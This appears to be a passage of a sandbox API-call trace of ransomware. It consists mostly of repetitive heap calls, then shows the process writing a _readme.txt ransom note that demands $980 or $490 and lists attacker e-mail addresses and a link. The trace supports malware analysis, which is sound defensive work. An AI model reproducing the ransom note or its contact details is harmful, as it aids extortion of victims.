dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.904] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac21a8 | out: hHeap=0x620000) returned 1 [0142.904] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac21a8 [0142.904] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aaf2b8 [0142.905] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.905] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac21a8 | out: hHeap=0x620000) returned 1 [0142.905] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac21a8 [0142.905] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aaf2b8 [0142.905] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x325d510 [0142.905] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.905] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x325d510 | out: hHeap=0x620000) returned 1 [0142.905] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac21a8 | out: hHeap=0x620000) returned 1 [0142.905] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac21a8 [0142.905] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aaf2b8 [0142.905] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.905] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac21a8 | out: hHeap=0x620000) returned 1 [0142.905] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac21a8 [0142.905] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aaf2b8 [0142.905] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc2e) returned 0x325d510 [0142.905] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.905] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x325d510 | out: hHeap=0x620000) returned 1 [0142.905] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac21a8 | out: hHeap=0x620000) returned 1 [0142.905] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac21a8 [0142.905] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3221ae8 [0142.905] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3221ae8 | out: hHeap=0x620000) returned 1 [0142.905] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac21a8 | out: hHeap=0x620000) returned 1 [0142.905] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac21a8 [0142.905] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3221ae8 [0142.905] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3221ae8 | out: hHeap=0x620000) returned 1 [0142.905] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac21a8 | out: hHeap=0x620000) returned 1 [0142.905] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac21a8 [0142.905] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aaf2b8 [0142.905] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.905] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac21a8 | out: hHeap=0x620000) returned 1 [0142.905] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac21a8 [0142.905] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aaf2b8 [0142.905] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.905] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac21a8 | out: hHeap=0x620000) returned 1 [0142.905] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac21a8 [0142.906] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aaf2b8 [0142.906] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x325d510 [0142.906] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.906] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x325d510 | out: hHeap=0x620000) returned 1 [0142.906] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac21a8 | out: hHeap=0x620000) returned 1 [0142.906] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac21a8 [0142.906] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x9aaf2b8 [0142.906] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.906] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac21a8 | out: hHeap=0x620000) returned 1 [0142.906] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac21a8 [0142.906] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x9aaf2b8 [0142.906] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.906] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac21a8 | out: hHeap=0x620000) returned 1 [0142.906] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac21a8 [0142.906] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aaf2b8 [0142.906] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.906] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac21a8 | out: hHeap=0x620000) returned 1 [0142.906] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac21a8 [0142.906] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aaf2b8 [0142.906] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.906] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac21a8 | out: hHeap=0x620000) returned 1 [0142.906] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac21a8 [0142.906] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aaf2b8 [0142.906] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.906] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac21a8 | out: hHeap=0x620000) returned 1 [0142.906] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac21a8 [0142.906] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aaf2b8 [0142.906] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.906] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac21a8 | out: hHeap=0x620000) returned 1 [0142.906] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac21a8 [0142.906] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aaf2b8 [0142.907] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.907] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac21a8 | out: hHeap=0x620000) returned 1 [0142.907] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac21a8 [0142.907] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aaf2b8 [0142.907] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.907] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac21a8 | out: hHeap=0x620000) returned 1 [0142.907] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac21a8 [0142.907] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aaf2b8 [0142.907] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.907] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac21a8 | out: hHeap=0x620000) returned 1 [0142.907] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac21a8 [0142.907] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aaf2b8 [0142.907] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x325d510 [0142.907] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.907] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x325d510 | out: hHeap=0x620000) returned 1 [0142.907] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac21a8 | out: hHeap=0x620000) returned 1 [0142.907] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac21a8 [0142.907] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aaf2b8 [0142.907] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.907] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac21a8 | out: hHeap=0x620000) returned 1 [0142.907] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac21a8 [0142.907] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3221ae8 [0142.907] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3221ae8 | out: hHeap=0x620000) returned 1 [0142.907] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac21a8 | out: hHeap=0x620000) returned 1 [0142.907] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac21a8 [0142.907] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3221ae8 [0142.908] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3221ae8 | out: hHeap=0x620000) returned 1 [0142.908] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac21a8 | out: hHeap=0x620000) returned 1 [0142.908] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac21a8 [0142.908] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aaf2b8 [0142.908] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.908] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac21a8 | out: hHeap=0x620000) returned 1 [0142.908] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac21a8 [0142.908] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aaf2b8 [0142.908] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.908] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac21a8 | out: hHeap=0x620000) returned 1 [0142.908] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac21a8 [0142.908] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aaf2b8 [0142.908] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x325d510 [0142.908] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.908] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x325d510 | out: hHeap=0x620000) returned 1 [0142.908] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac21a8 | out: hHeap=0x620000) returned 1 [0142.908] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac21a8 [0142.908] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x9aaf2b8 [0142.908] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.908] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac21a8 | out: hHeap=0x620000) returned 1 [0142.908] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac21a8 [0142.908] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x9aaf2b8 [0142.908] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.908] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac21a8 | out: hHeap=0x620000) returned 1 [0142.908] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac21a8 [0142.908] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aaf2b8 [0142.908] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.908] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac21a8 | out: hHeap=0x620000) returned 1 [0142.908] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac21a8 [0142.908] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aaf2b8 [0142.908] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.908] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac21a8 | out: hHeap=0x620000) returned 1 [0142.908] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac21a8 [0142.908] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aaf2b8 [0142.909] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.909] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac21a8 | out: hHeap=0x620000) returned 1 [0142.909] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac21a8 [0142.909] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aaf2b8 [0142.909] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.909] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac21a8 | out: hHeap=0x620000) returned 1 [0142.909] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac21a8 [0142.909] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aaf2b8 [0142.909] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.909] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac21a8 | out: hHeap=0x620000) returned 1 [0142.909] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac21a8 [0142.909] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aaf2b8 [0142.909] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.909] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac21a8 | out: hHeap=0x620000) returned 1 [0142.909] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac21a8 [0142.909] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aaf2b8 [0142.909] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.909] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac21a8 | out: hHeap=0x620000) returned 1 [0142.909] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac21a8 [0142.909] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aaf2b8 [0142.909] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x325d510 [0142.909] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.909] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x325d510 | out: hHeap=0x620000) returned 1 [0142.909] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac21a8 | out: hHeap=0x620000) returned 1 [0142.909] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac21a8 [0142.909] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aaf2b8 [0142.909] PathFindFileNameW (pszPath="C:\\Boot\\ru-RU\\") returned="ru-RU\\" [0142.909] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.909] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0142.910] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0142.910] PathFindFileNameW (pszPath="") returned="" [0142.910] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.910] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x759d0000 [0142.910] GetProcAddress (hModule=0x759d0000, lpProcName="SHGetFolderPathW") returned 0x75a55708 [0142.910] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x800) returned 0x3221ae8 [0142.910] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x3221ae8 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0142.910] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x810) returned 0x9aaf2b8 [0142.910] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac21a8 [0142.910] FreeLibrary (hLibModule=0x759d0000) returned 1 [0142.910] PathAppendW (in: pszPath="C:\\Boot\\ru-RU\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\ru-RU\\_readme.txt") returned 1 [0142.910] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aafb40 [0142.910] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.911] PathFileExistsW (pszPath="C:\\Boot\\ru-RU\\_readme.txt") returned 0 [0142.911] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x7d00) returned 0x9ad6f98 [0142.911] lstrcpyW (in: lpString1=0x9ad6f98, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-xcn1Dtzak4\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@firemail.cc\r\n\r\nYour personal ID:\r\n0224yiuduy6S5d" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-xcn1Dtzak4\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@firemail.cc\r\n\r\nYour personal ID:\r\n0224yiuduy6S5d") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-xcn1Dtzak4\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@firemail.cc\r\n\r\nYour personal ID:\r\n0224yiuduy6S5d" [0142.911] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-xcn1Dtzak4\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@firemail.cc\r\n\r\nYour personal ID:\r\n0224yiuduy6S5d", lpString2="9UR8CEfVlhGJx3jwwXdVqZ3owpwVZwN7BjVbRUSR" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-xcn1Dtzak4\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@firemail.cc\r\n\r\nYour personal ID:\r\n0224yiuduy6S5d9UR8CEfVlhGJx3jwwXdVqZ3owpwVZwN7BjVbRUSR") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-xcn1Dtzak4\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@firemail.cc\r\n\r\nYour personal ID:\r\n0224yiuduy6S5d9UR8CEfVlhGJx3jwwXdVqZ3owpwVZwN7BjVbRUSR" [0142.912] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9ab03c8 [0142.912] CreateFileW (lpFileName="C:\\Boot\\ru-RU\\_readme.txt" (normalized: "c:\\boot\\ru-ru\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x6f0 [0142.912] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8c0) returned 0x3221ae8 [0142.912] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x85b) returned 0x325d510 [0142.912] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-xcn1Dtzak4\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@firemail.cc\r\n\r\nYour personal ID:\r\n0224yiuduy6S5d9UR8CEfVlhGJx3jwwXdVqZ3owpwVZwN7BjVbRUSR", cchWideChar=-1, lpMultiByteStr=0x325d510, cbMultiByte=2139, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-xcn1Dtzak4\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@firemail.cc\r\n\r\nYour personal ID:\r\n0224yiuduy6S5d9UR8CEfVlhGJx3jwwXdVqZ3owpwVZwN7BjVbRUSR", lpUsedDefaultChar=0x0) returned 1116 [0142.912] RtlAllocateHeap 